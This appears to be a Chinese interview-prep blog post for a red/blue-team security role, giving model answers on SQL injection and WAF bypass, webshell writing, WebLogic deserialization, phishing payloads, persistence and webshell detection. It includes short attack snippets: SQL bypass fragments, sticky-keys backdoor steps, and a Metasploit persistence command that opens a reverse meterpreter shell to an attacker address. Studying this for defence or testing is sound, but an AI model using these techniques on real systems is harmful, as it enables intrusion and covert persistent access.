HW面试题

2022-11-19 14:39:06 浏览数 (1)

目录

一,自我介绍

二,面试的问题

1.你了解sql注入吗 ?Sql注入怎么绕waf?

2.Sql注入写webshell怎么做 ?

 3.常见的漏洞端口有哪些?

4.中间件漏洞了解几个? 

5. 如何隐藏自己的流量和ip

6.对于redis未授权,可以大概说一下吗?

7. 对于数据包或者日志你的分析思路是什么,以及你会用到哪些工具或者那些网站进行查询?

 8.钓鱼软件的上线方式?

9. 内网权限的维持怎么维持?

10. 怎么检测webshell呢?

一,自我介绍

今天能参加面试,有机会向考官请教和学习,我感到非常的荣幸,我叫xxx,今年2xx岁,毕业于xxx,在学校实验室里做过一些渗透测试的项目,主要负责监控告警,判断真实攻击,并封禁上报,目前就在家精近自己的技术,自己组建了网鼎杯的队伍,趁着现在有空参加一下的国护。我主要学的方向是常见的web漏洞,,内网穿透,应急响应,。希望通过这次面试,把自己全方位展现出来。使用过Hfish,山石waf,微步云沙箱,情报分析,还有河马,百度shell等等。

二,面试的问题

1.你了解sql注入吗 ?Sql注入怎么绕waf?

了解,主要方式有 大小写混合 union select 1,2,3,4     替换关键字 selselectect 1,2,3,4 使用编码 Union Select 1,2,3,4 使用注释 union/**/select 1,2,3,4等几种方式

2.Sql注入写webshell怎么做 ?

 前提条件是select into outfile方法可用(允许导出文件),需要知道网站所在的绝对路径,还要有足够的权限能够写入,root权限,主要有以下几种方式union select写入,Lines terminated by写入,lines starting by写入,fields terminated by写入,COLUMNS terminated by写入这几种写入方式

 3.常见的漏洞端口有哪些?

21ftp  22ssh  23 telnet  53dns  80web即http   1433sqlsever  3306mysql  3389远程桌面,6379redis,8080tomcat   7001weblogic

4.中间件漏洞了解几个?

比较了解几个常见的中间件,我了解过的java的几个,一个tomcat,weblogic,jboss,这一些中间件漏洞的话,像weblogic的漏洞很多,比如弱口令,ssrf,反序列化,任意文件上传,端口是7001,但是weblogic这个中间件,存在最多的漏洞就是反序列化,我之前看过好像是奇安信的一个统计,weblogic出现的最多的漏洞就是反序列化,我只是复现过一次这个,知道了一下原理:通过xml外部实体注入执行外部远程命令脚本下载,再次加载这个xml获得一个反弹shell

5. 如何隐藏自己的流量和ip

之前用自己的服务器进行过流量隐藏,先是购买了一个.vip的域名,然后寻找了一个免费的CDN网站进行设置,把域名数据放置到虚拟CDN上,这样就完成了一个初步的流量隐藏。 

6.对于redis未授权,可以大概说一下吗?

Redis服务绑定到公共接口,甚至没有密码身份验证保护。 部分Redis 绑定在6379端口上,并且没有开启认证(这是Redis的默认配置),而又暴露在公网上,这样就会导致任意用户在可以访问此公网的情况下未授权访问Redis以及读取Redis的数据 。

7. 对于数据包或者日志你的分析思路是什么,以及你会用到哪些工具或者那些网站进行查询?

用流量监测的安全设备,比如天眼,查看报文,分析报文里和host和网站目录路径,查看是否可疑,使用微步查询host是否为恶意,使用wireshark对数据包深度分析看一下请求的网站路径,源IP与目的ip地址,host字段的值以及发包内容等工具有wireshark,网站的话微步在线等 

 8.钓鱼软件的上线方式?

主要是运用了CS生成后门软件,比如windows可执行的程序.exe文件,这个用的比较多,其次还有office宏,还有hta文档,还有CS克隆网站钓鱼等 。

9. 内网权限的维持怎么维持?

第一个方法是shift后门 比如找到shift文件的位置,然后更改权限为管理员权限,即administrator然后此时就可以更改这个文件的名称,然后接着复制一份cmd的exe文件,然后改名成为粘贴键的名字,那么此时就可以在任何位置,连续敲击五次shift,就会弹出cmd的窗口 第二种,就是添加注册表在获得对方的shell之后,将msf生成的反弹shell的exe 文件,路径添加进注册表里面比如上线msf之后,将msf里面的模块persisitence的模块利用注册便启动项后门的,输入run persistentce -h run persisitence -U -P windows/x64/meterpreter/reverse_tcp -i 参数  -p端口 -r ip就可以实现了,但是目标关机之后,需要在msf里面设置外联。

10. 怎么检测webshell呢?

1.静态检测       静态检测通过匹配特征码,特征值,危险函数函数来查找webshell的方法,只能查找已知的webshell。 2.动态检测       webshell传到服务器了,黑客总要去执行它吧,webshell执行时刻表现出来的特征,我们称为动态特征。 3.日志检测       使用Webshell一般不会在系统日志中留下记录,但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。 4.语法检测       语法语义分析形式,是根据php语言扫描编译的实现方式,进行剥离代码、注释,分析变量、函数、字符串、语言结构的分析方式,来实现关键危险函数的捕捉方式。这样可以完美解决漏报的情况。但误报上,仍存在问题。

以上题目仅代表个人观点,欢迎各位大佬指正 !!!!!!

0 人点赞